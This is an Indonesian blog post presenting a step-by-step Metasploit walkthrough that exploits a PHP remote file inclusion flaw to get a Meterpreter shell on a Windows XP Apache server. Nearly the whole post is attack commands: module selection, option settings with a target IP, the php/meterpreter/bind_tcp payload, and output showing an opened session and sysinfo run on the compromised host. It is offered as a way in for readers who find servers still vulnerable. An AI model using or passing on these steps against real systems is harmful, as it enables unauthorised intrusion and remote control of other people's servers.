Posts Subscribe comment Comments

PHP Meterpreter !!! lewat RFI ....

Ini jaman jadul ... menggunakan windows xp sebagai server apache servernya.
tapi siapa tau klo ada yang masih menggunakannya....
cara masukknya adalah sebagai berikut...

(tapi ini langka sekaligus jadul )

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > show options

Module options:

... Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /opt/metasploit3/msf3/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Exploit target:

Id Name
-- ----
0 Automatic
 
msf exploit(php_include) > set PHPURI /rfi_me.php?path=XXpathXX
PHPURI => /rfi_me.php?path=XXpathXX
msf exploit(php_include) > set RHOST 192.168.1.150
RHOST => 192.168.1.150
msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_include) > exploit

[*] Started bind handler
...[*] Using URL: http://0.0.0.0:8080/ehgqo4
[*] Local IP: http://192.168.1.101:8080/ehgqo4
[*] PHP include server started.
[*] Sending stage (29382 bytes) to 192.168.1.150
[*] Meterpreter session 1 opened (192.168.1.101:56931 -> 192.168.1.150:4444) at 2010-08-21 14:35:51 -0600

meterpreter > sysinfo
Computer: V-XPSP2-SPLOIT-
OS : Windows NT V-XPSP2-SPLOIT- 5.1 build 2600 (Windows XP Professional Service Pack 2) i586
meterpreter >
 
  
 

0

Silahkan Tulis Komentar Anda ...